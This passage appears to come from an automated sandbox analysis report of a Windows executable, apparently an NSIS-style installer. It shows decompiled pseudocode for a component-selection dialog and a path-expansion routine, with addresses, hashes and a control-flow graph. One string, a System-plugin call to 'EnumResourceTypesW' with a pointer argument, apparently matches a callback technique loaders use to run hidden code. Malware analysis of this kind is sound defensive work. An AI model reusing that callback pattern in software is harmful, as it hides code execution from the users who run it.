											_t235 = _t233 * 0x418 + _t285 + 8;
											 *_t235 =  *_t235 & 0xffffffdf;
											__eflags =  *_t235;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404770(_v8, _a8 != 0x413);
								_t311 = _t239;
								__eflags = _t311 - _t282;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									__eflags = _t241 & 0x00000010;
									if((_t241 & 0x00000010) == 0) {
										__eflags = _t241 & 0x00000040;
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
											__eflags = _t242;
										} else {
											_t248 = _t241 ^ 0x00000080;
											__eflags = _t248;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_t244 =  *0x42ebb8; // 0x0
										_t247 =  !_t244 >> 0x00000008 & 0x00000001;
										__eflags = _t247;
										_a12 = _t311 + 1;
										_a16 = _t247;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							__eflags =  *((intOrPtr*)(_t285 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t285 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t285 + 4)) - 0x408;
						if( *((intOrPtr*)(_t285 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t282, _t282);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t219 =  *0x42a004;
									__eflags = _t219 - _t282;
									if(_t219 != _t282) {
										ImageList_Destroy(_t219);
									}
									_t220 =  *0x42a018;
									__eflags = _t220 - _t282;
									if(_t220 != _t282) {
										GlobalFree(_t220);
									}
									 *0x42a004 = _t282;
									 *0x42a018 = _t282;
									 *0x42ec00 = _t282;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L88:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ebb9 & 0x00000001;
										if(( *0x42ebb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t187 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t187;
											_t307 = _t187;
											ShowWindow(_v8, _t307);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
										}
									}
									goto L91;
								} else {
									E004011EF(_t285, _t282, _t282);
									_t192 = _a12;
									__eflags = _t192 - _t282;
									if(_t192 != _t282) {
										__eflags = _t192 - 0xffffffff;
										if(_t192 != 0xffffffff) {
											_t192 = _t192 - 1;
											__eflags = _t192;
										}
										_push(_t192);
										_push(8);
										E004047F0();
									}
									__eflags = _a16 - _t282;
									if(_a16 == _t282) {
										L75:
										E004011EF(_t285, _t282, _t282);
										__eflags =  *0x42ebcc - _t282; // 0x1
										_v32 =  *0x42a018;
										_t195 =  *0x42ebc8; // 0x5aa474
										_v60 = 0xf030;
										_v20 = _t282;
										if(__eflags <= 0) {
											L86:
											InvalidateRect(_v8, _t282, 1);
											_t197 =  *0x42e37c; // 0x5ac8c7
											__eflags =  *((intOrPtr*)(_t197 + 0x10)) - _t282;
											if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
												E0040468E(0x3ff, 0xfffffffb, E00404743(5));
											}
											goto L88;
										} else {
											_t138 = _t195 + 8; // 0x5aa47c
											_t308 = _t138;
											do {
												_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
												__eflags = _t201 - _t282;
												if(_t201 != _t282) {
													_t287 =  *_t308;
													_v68 = _t201;
													__eflags = _t287 & 0x00000001;
													_v72 = 8;
													if((_t287 & 0x00000001) != 0) {
														_t147 =  &(_t308[4]); // 0x5aa48c
														_v72 = 9;
														_v56 = _t147;
														_t150 =  &(_t308[0]);
														 *_t150 = _t308[0] & 0x000000fe;
														__eflags =  *_t150;
													}
													__eflags = _t287 & 0x00000040;
													if((_t287 & 0x00000040) == 0) {
														_t205 = (_t287 & 0x00000001) + 1;
														__eflags = _t287 & 0x00000010;
														if((_t287 & 0x00000010) != 0) {
															_t205 = _t205 + 3;
															__eflags = _t205;
														}
													} else {
														_t205 = 3;
													}
													_t290 = (_t287 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t290;
													_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t290, _v68);
													SendMessageA(_v8, 0x110d, _t282,  &_v72);
												}
												_v20 = _v20 + 1;
												_t308 =  &(_t308[0x106]);
												__eflags = _v20 -  *0x42ebcc; // 0x1
											} while (__eflags < 0);
											goto L86;
										}
									} else {
										_t309 = E004012E2( *0x42a018);
										E00401299(_t309);
										_t216 = 0;
										_t285 = 0;
										__eflags = _t309 - _t282;
										if(_t309 <= _t282) {
											L74:
											SendMessageA(_v12, 0x14e, _t285, _t282);
											_a16 = _t309;
											_a8 = 0x420;
											goto L75;
										} else {
											goto L71;
										}
										do {
											L71:
											_t301 = _v24;
											__eflags =  *((intOrPtr*)(_t301 + _t216 * 4)) - _t282;
											if( *((intOrPtr*)(_t301 + _t216 * 4)) != _t282) {
												_t285 = _t285 + 1;
												__eflags = _t285;
											}
											_t216 = _t216 + 1;
											__eflags = _t216 - _t309;
										} while (_t216 < _t309);
										goto L74;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L91;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L91;
							}
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							__eflags = _t226 - 0xffffffff;
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							__eflags = _t310 - 0xffffffff;
							if(_t310 == 0xffffffff) {
								L54:
								_t310 = 0x20;
								L55:
								E00401299(_t310);
								SendMessageA(_a4, 0x420, _t282, _t310);
								_t119 =  &_a12;
								 *_t119 = _a12 | 0xffffffff;
								__eflags =  *_t119;
								_a16 = _t282;
								_a8 = 0x40f;
								goto L56;
							}
							_t230 = _v24;
							__eflags =  *((intOrPtr*)(_t230 + _t310 * 4)) - _t282;
							if( *((intOrPtr*)(_t230 + _t310 * 4)) != _t282) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					_t249 =  *0x42ebcc; // 0x1
					_v32 = 0;
					_v16 = 2;
					 *0x42ec00 = _t306;
					 *0x42a018 = GlobalAlloc(0x40, _t249 << 2);
					_t252 = LoadBitmapA( *0x42eba0, 0x6e);
					 *0x42a00c =  *0x42a00c | 0xffffffff;
					_t313 = _t252;
					 *0x42a014 = SetWindowLongA(_v8, 0xfffffffc, E00404E19);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a004 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a004);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							_t279 = SendMessageA(_v12, 0x143, _t282, E00405BBA(_t282, _t314, _t318, _t282, _t260)); // executed
							SendMessageA(_v12, 0x151, _t279, _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E00403EA8(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E00403EA8(_a4);
					_t316 = 0;
					_t284 = 0;
					_t326 =  *0x42ebcc - _t316; // 0x1
					if(_t326 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									__eflags = _t271 & 0x00000004;
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84); // executed
										 *( *0x42a018 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v32 = 1;
									 *( *0x42a018 + _t316 * 4) = _t276;
									_t284 =  *( *0x42a018 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_t329 = _t316 -  *0x42ebcc; // 0x1
							_v28 = _t302;
						} while (_t329 < 0);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EDD(_v8);
								_t282 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EDD(_v12);
								L91:
								return E00403F0F(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}











































































                                  0x00404831
                                  0x00404842
                                  0x00404847
                                  0x0040484a
                                  0x0040484f
                                  0x00404855
                                  0x00404858
                                  0x0040485d
                                  0x0040486b
                                  0x0040486e
                                  0x00404a8e
                                  0x00404a8e
                                  0x00404a95
                                  0x00404aa9
                                  0x00404a97
                                  0x00404a99
                                  0x00404a9c
                                  0x00404a9d
                                  0x00404aa4
                                  0x00404aa4
                                  0x00404aac
                                  0x00404ab5
                                  0x00404ac0
                                  0x00404ac0
                                  0x00404ac3
                                  0x00404ac6
                                  0x00404ad5
                                  0x00404ad5
                                  0x00404adc
                                  0x00404b51
                                  0x00404b51
                                  0x00404b54
                                  0x00404b56
                                  0x00404b59
                                  0x00404b60
                                  0x00404b6e
                                  0x00404b6e
                                  0x00404b70
                                  0x00404b73
                                  0x00404b7a
                                  0x00404b7c
                                  0x00404b80
                                  0x00404b83
                                  0x00404b86
                                  0x00404b9d
                                  0x00404ba1
                                  0x00404ba1
                                  0x00404b88
                                  0x00404b92
                                  0x00404b92
                                  0x00404b86
                                  0x00404b7a
                                  0x00000000
                                  0x00404b54
                                  0x00404ade
                                  0x00404ae1
                                  0x00404aec
                                  0x00404aee
                                  0x00404af1
                                  0x00404af8
                                  0x00404afd
                                  0x00404aff
                                  0x00404b01
                                  0x00404b0c
                                  0x00404b0c
                                  0x00404b10
                                  0x00404b12
                                  0x00404b14
                                  0x00404b16
                                  0x00404b18
                                  0x00404b2b
                                  0x00404b2b
                                  0x00404b1a
                                  0x00404b1a
                                  0x00404b1f
                                  0x00404b21
                                  0x00404b27
                                  0x00404b23
                                  0x00404b23
                                  0x00404b23
                                  0x00404b21
                                  0x00404b2f
                                  0x00404b31
                                  0x00404b36
                                  0x00404b41
                                  0x00404b41
                                  0x00404b44
                                  0x00404b47
                                  0x00404b4a
                                  0x00404b4a
                                  0x00404b14
                                  0x00000000
                                  0x00404b01
                                  0x00404ae3
                                  0x00404ae6
                                  0x00404aea
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404aea
                                  0x00404ac8
                                  0x00404acf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404ab7
                                  0x00404ab7
                                  0x00404aba
                                  0x00404ba4
                                  0x00404ba4
                                  0x00404bab
                                  0x00404c1c
                                  0x00404c21
                                  0x00404c24
                                  0x00404c2c
                                  0x00404c2c
                                  0x00404c2e
                                  0x00404c35
                                  0x00404c37
                                  0x00404c3c
                                  0x00404c3e
                                  0x00404c41
                                  0x00404c41
                                  0x00404c47
                                  0x00404c4c
                                  0x00404c4e
                                  0x00404c51
                                  0x00404c51
                                  0x00404c57
                                  0x00404c5d
                                  0x00404c63
                                  0x00404c63
                                  0x00404c69
                                  0x00404c70
                                  0x00404dc6
                                  0x00404dc6
                                  0x00404dcd
                                  0x00404dcf
                                  0x00404dd6
                                  0x00404dda
                                  0x00404de7
                                  0x00404de7
                                  0x00404dea
                                  0x00404df0
                                  0x00404e02
                                  0x00404e02
                                  0x00404dd6
                                  0x00000000
                                  0x00404c76
                                  0x00404c78
                                  0x00404c7d
                                  0x00404c80
                                  0x00404c82
                                  0x00404c84
                                  0x00404c87
                                  0x00404c89
                                  0x00404c89
                                  0x00404c89
                                  0x00404c8a
                                  0x00404c8b
                                  0x00404c8d
                                  0x00404c8d
                                  0x00404c92
                                  0x00404c95
                                  0x00404cd6
                                  0x00404cd8
                                  0x00404ce2
                                  0x00404ce8
                                  0x00404ceb
                                  0x00404cf0
                                  0x00404cf7
                                  0x00404cfa
                                  0x00404d9c
                                  0x00404da2
                                  0x00404da8
                                  0x00404dad
                                  0x00404db0
                                  0x00404dc1
                                  0x00404dc1
                                  0x00000000
                                  0x00404d00
                                  0x00404d00
                                  0x00404d00
                                  0x00404d03
                                  0x00404d09
                                  0x00404d0c
                                  0x00404d0e
                                  0x00404d10
                                  0x00404d12
                                  0x00404d15
                                  0x00404d18
                                  0x00404d1f
                                  0x00404d21
                                  0x00404d24
                                  0x00404d2b
                                  0x00404d2e
                                  0x00404d2e
                                  0x00404d2e
                                  0x00404d2e
                                  0x00404d32
                                  0x00404d35
                                  0x00404d41
                                  0x00404d42
                                  0x00404d45
                                  0x00404d47
                                  0x00404d47
                                  0x00404d47
                                  0x00404d37
                                  0x00404d39
                                  0x00404d39
                                  0x00404d66
                                  0x00404d66
                                  0x00404d67
                                  0x00404d73
                                  0x00404d82
                                  0x00404d82
                                  0x00404d84
                                  0x00404d87
                                  0x00404d90
                                  0x00404d90
                                  0x00000000
                                  0x00404d03
                                  0x00404c97
                                  0x00404ca2
                                  0x00404ca5
                                  0x00404caa
                                  0x00404cac
                                  0x00404cae
                                  0x00404cb0
                                  0x00404cc0
                                  0x00404cca
                                  0x00404ccc
                                  0x00404ccf
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404cb2
                                  0x00404cb2
                                  0x00404cb2
                                  0x00404cb5
                                  0x00404cb8
                                  0x00404cba
                                  0x00404cba
                                  0x00404cba
                                  0x00404cbb
                                  0x00404cbc
                                  0x00404cbc
                                  0x00000000
                                  0x00404cb2
                                  0x00404c95
                                  0x00404c70
                                  0x00404bad
                                  0x00404bb3
                                  0x00000000
                                  0x00000000
                                  0x00404bbf
                                  0x00404bc3
                                  0x00000000
                                  0x00000000
                                  0x00404bd3
                                  0x00404bd5
                                  0x00404bd8
                                  0x00000000
                                  0x00000000
                                  0x00404bea
                                  0x00404bec
                                  0x00404bef
                                  0x00404bf9
                                  0x00404bfb
                                  0x00404bfc
                                  0x00404bfd
                                  0x00404c0c
                                  0x00404c0e
                                  0x00404c0e
                                  0x00404c0e
                                  0x00404c12
                                  0x00404c15
                                  0x00000000
                                  0x00404c15
                                  0x00404bf1
                                  0x00404bf4
                                  0x00404bf7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404bf7
                                  0x00000000
                                  0x00404aba
                                  0x00404874
                                  0x00404874
                                  0x00404879
                                  0x00404882
                                  0x00404889
                                  0x00404897
                                  0x004048a2
                                  0x004048a8
                                  0x004048b6
                                  0x004048ca
                                  0x004048cf
                                  0x004048dc
                                  0x004048e1
                                  0x004048f7
                                  0x00404908
                                  0x00404915
                                  0x00404915
                                  0x00404918
                                  0x0040491e
                                  0x00404920
                                  0x00404923
                                  0x00404928
                                  0x0040492d
                                  0x0040492f
                                  0x0040492f
                                  0x00404943
                                  0x0040494f
                                  0x0040494f
                                  0x00404951
                                  0x00404952
                                  0x00404957
                                  0x0040495a
                                  0x0040495d
                                  0x00404961
                                  0x00404966
                                  0x0040496b
                                  0x0040496f
                                  0x00404974
                                  0x00404979
                                  0x0040497b
                                  0x0040497d
                                  0x00404983
                                  0x00404a4d
                                  0x00404a60
                                  0x00000000
                                  0x00404989
                                  0x0040498c
                                  0x0040498f
                                  0x00404992
                                  0x00404992
                                  0x00404998
                                  0x0040499e
                                  0x004049a1
                                  0x004049a7
                                  0x004049a8
                                  0x004049ad
                                  0x004049b6
                                  0x004049bd
                                  0x004049c0
                                  0x004049c3
                                  0x004049c6
                                  0x00404a00
                                  0x00404a02
                                  0x00404a23
                                  0x00404a2b
                                  0x00404a04
                                  0x00404a11
                                  0x00404a11
                                  0x004049c8
                                  0x004049cb
                                  0x004049da
                                  0x004049e4
                                  0x004049ec
                                  0x004049f3
                                  0x004049fb
                                  0x004049fb
                                  0x004049c6
                                  0x00404a31
                                  0x00404a32
                                  0x00404a38
                                  0x00404a3e
                                  0x00404a3e
                                  0x00404a4b
                                  0x00404a66
                                  0x00404a6a
                                  0x00404a87
                                  0x00404a8c
                                  0x00404a8c
                                  0x00000000
                                  0x00404a6c
                                  0x00404a71
                                  0x00404a7a
                                  0x00404e04
                                  0x00404e16
                                  0x00404e16
                                  0x00404a6a
                                  0x00000000
                                  0x00404a4b
                                  0x00404983

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 1638840714-813528018
                                  • Opcode ID: 4d8d19e2ec862d8bfba0754ba844338e27a2af66167a0e8515c43c7f1b85903c
                                  • Instruction ID: 4cc0e2b80a329b10f62a048024603937819052accddc3c4311639f2bc02e2ced
                                  • Opcode Fuzzy Hash: 4d8d19e2ec862d8bfba0754ba844338e27a2af66167a0e8515c43c7f1b85903c
                                  • Instruction Fuzzy Hash: 2E0281B0A00209AFDB20DF55DD45AAE7BB5FB84315F10413AF610B62E1C7789E51DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405BBA Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 475 405bba-405bc5 476 405bc7-405bd6 475->476 477 405bd8-405bed 475->477 476->477 478 405de0-405de4 477->478 479 405bf3-405bfe 477->479 481 405c10-405c1a 478->481 482 405dea-405df4 478->482 479->478 480 405c04-405c0b 479->480 480->478 481->482 483 405c20-405c27 481->483 484 405df6-405dfa call 405b98 482->484 485 405dff-405e00 482->485 486 405dd3 483->486 487 405c2d-405c62 483->487 484->485 489 405dd5-405ddb 486->489 490 405ddd-405ddf 486->490 491 405c68-405c73 GetVersion 487->491 492 405d7d-405d80 487->492 489->478 490->478 493 405c75-405c79 491->493 494 405c8d 491->494 495 405db0-405db3 492->495 496 405d82-405d85 492->496 493->494 499 405c7b-405c7f 493->499 502 405c94-405c9b 494->502 497 405dc1-405dd1 lstrlenA 495->497 498 405db5-405dbc call 405bba 495->498 500 405d95-405da1 call 405b98 496->500 501 405d87-405d93 call 405af6 496->501 497->478 498->497 499->494 504 405c81-405c85 499->504 513 405da6-405dac 500->513 501->513 506 405ca0-405ca2 502->506 507 405c9d-405c9f 502->507 504->494 509 405c87-405c8b 504->509 511 405ca4-405cbf call 405a7f 506->511 512 405cdb-405cde 506->512 507->506 509->502 518 405cc4-405cc7 511->518 514 405ce0-405cec GetSystemDirectoryA 512->514 515 405cee-405cf1 512->515 513->497 517 405dae 513->517 520 405d5f-405d62 514->520 521 405cf3-405d01 GetWindowsDirectoryA 515->521 522 405d5b-405d5d 515->522 519 405d75-405d7b call 405e03 517->519 523 405d64-405d68 518->523 524 405ccd-405cd6 call 405bba 518->524 519->497 520->519 520->523 521->522 522->520 525 405d03-405d0d 522->525 523->519 528 405d6a-405d70 lstrcatA 523->528 524->520 530 405d27-405d3d SHGetSpecialFolderLocation 525->530 531 405d0f-405d12 525->531 528->519 534 405d58 530->534 535 405d3f-405d56 SHGetPathFromIDListA CoTaskMemFree 530->535 531->530 533 405d14-405d1b 531->533 536 405d23-405d25 533->536 534->522 535->520 535->534 536->520 536->530
                                  C-Code - Quality: 74%
                                  			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t37;
				CHAR* _t38;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t70;
				intOrPtr _t74;
				signed int _t75;
				signed int _t76;
				intOrPtr _t80;
				char _t82;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t96;
				signed int _t98;
				void* _t99;

				_t89 = __esi;
				_t86 = __edi;
				_t64 = __ebx;
				_t37 = _a8;
				if(_t37 < 0) {
					_t80 =  *0x42e37c; // 0x5ac8c7
					_t37 =  *(_t80 - 4 + _t37 * 4);
				}
				_t74 =  *0x42ebd8; // 0x5aba28
				_push(_t64);
				_t75 = _t74 + _t37;
				_t38 = 0x42db40;
				_push(_t89);
				_push(_t86);
				_t87 = 0x42db40;
				if(_a4 >= 0x42db40 && _a4 - 0x42db40 < 0x800) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t82 =  *_t75;
					if(_t82 == 0) {
						break;
					}
					__eflags = _t87 - _t38 - 0x400;
					if(_t87 - _t38 >= 0x400) {
						break;
					}
					_t75 = _t75 + 1;
					__eflags = _t82 - 4;
					_a8 = _t75;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t82;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t75;
							_t87 =  &(_t87[1]);
							_t75 = _t75 + 1;
						}
						continue;
					}
					_t40 =  *(_t75 + 1);
					_t76 =  *_t75;
					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t76 | 0x00000080;
					_t70 = _t76;
					_v24 = _t70;
					__eflags = _t82 - 2;
					_v20 = _t40 | 0x00000080;
					_v16 = _t40;
					if(_t82 != 2) {
						__eflags = _t82 - 3;
						if(_t82 != 3) {
							__eflags = _t82 - 1;
							if(_t82 == 1) {
								__eflags = (_t40 | 0xffffffff) - _t96;
								E00405BBA(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
							}
							L42:
							_t41 = lstrlenA(_t87);
							_t75 = _a8;
							_t87 =  &(_t87[_t41]);
							_t38 = 0x42db40;
							continue;
						}
						__eflags = _t96 - 0x1d;
						if(_t96 != 0x1d) {
							__eflags = "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t96 << 0xa);
							E00405B98(_t87, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_t96 << 0xa));
						} else {
							E00405AF6(_t87,  *0x42eba8);
						}
						__eflags = _t96 + 0xffffffeb - 7;
						if(_t96 + 0xffffffeb < 7) {
							L33:
							E00405E03(_t87);
						}
						goto L42;
					}
					_t98 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42ec24;
						if( *0x42ec24 != 0) {
							_t98 = 4;
						}
						__eflags = _t70;
						if(_t70 >= 0) {
							__eflags = _t70 - 0x25;
							if(_t70 != 0x25) {
								__eflags = _t70 - 0x24;
								if(_t70 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x400);
									_t98 = 0;
								}
								while(1) {
									__eflags = _t98;
									if(_t98 == 0) {
										goto L30;
									}
									_t52 =  *0x42eba4; // 0x73521340
									_t98 = _t98 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L26:
										_t54 = SHGetSpecialFolderLocation( *0x42eba8,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t87);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t56 =  *_t52( *0x42eba8,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t56;
									if(_t56 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x400);
							goto L30;
						} else {
							_t73 = (_t70 & 0x0000003f) +  *0x42ebd8;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x42ebd8, _t87, _t70 & 0x00000040); // executed
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405BBA(_t73, _t87, _t98, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t38;
				}
				return E00405B98(_a4, _t38);
			}






























                                  0x00405bba
                                  0x00405bba
                                  0x00405bba
                                  0x00405bc0
                                  0x00405bc5
                                  0x00405bc7
                                  0x00405bd6
                                  0x00405bd6
                                  0x00405bd8
                                  0x00405bde
                                  0x00405bdf
                                  0x00405be1
                                  0x00405be9
                                  0x00405bea
                                  0x00405beb
                                  0x00405bed
                                  0x00405c04
                                  0x00405c07
                                  0x00405c07
                                  0x00405de0
                                  0x00405de0
                                  0x00405de4
                                  0x00000000
                                  0x00000000
                                  0x00405c14
                                  0x00405c1a
                                  0x00000000
                                  0x00000000
                                  0x00405c20
                                  0x00405c21
                                  0x00405c24
                                  0x00405c27
                                  0x00405dd3
                                  0x00405ddd
                                  0x00405ddf
                                  0x00405ddf
                                  0x00405dd5
                                  0x00405dd7
                                  0x00405dd9
                                  0x00405dda
                                  0x00405dda
                                  0x00000000
                                  0x00405dd3
                                  0x00405c2d
                                  0x00405c31
                                  0x00405c41
                                  0x00405c45
                                  0x00405c4c
                                  0x00405c4f
                                  0x00405c53
                                  0x00405c59
                                  0x00405c5c
                                  0x00405c5f
                                  0x00405c62
                                  0x00405d7d
                                  0x00405d80
                                  0x00405db0
                                  0x00405db3
                                  0x00405db8
                                  0x00405dbc
                                  0x00405dbc
                                  0x00405dc1
                                  0x00405dc2
                                  0x00405dc7
                                  0x00405dca
                                  0x00405dcc
                                  0x00000000
                                  0x00405dcc
                                  0x00405d82
                                  0x00405d85
                                  0x00405d9a
                                  0x00405da1
                                  0x00405d87
                                  0x00405d8e
                                  0x00405d8e
                                  0x00405da9
                                  0x00405dac
                                  0x00405d75
                                  0x00405d76
                                  0x00405d76
                                  0x00000000
                                  0x00405dac
                                  0x00405c6a
                                  0x00405c6b
                                  0x00405c71
                                  0x00405c73
                                  0x00405c8d
                                  0x00405c8d
                                  0x00405c94
                                  0x00405c94
                                  0x00405c9b
                                  0x00405c9f
                                  0x00405c9f
                                  0x00405ca0
                                  0x00405ca2
                                  0x00405cdb
                                  0x00405cde
                                  0x00405cee
                                  0x00405cf1
                                  0x00405cf9
                                  0x00405cff
                                  0x00405cff
                                  0x00405d5b
                                  0x00405d5b
                                  0x00405d5d
                                  0x00000000
                                  0x00000000
                                  0x00405d03
                                  0x00405d0a
                                  0x00405d0b
                                  0x00405d0d
                                  0x00405d27
                                  0x00405d35
                                  0x00405d3b
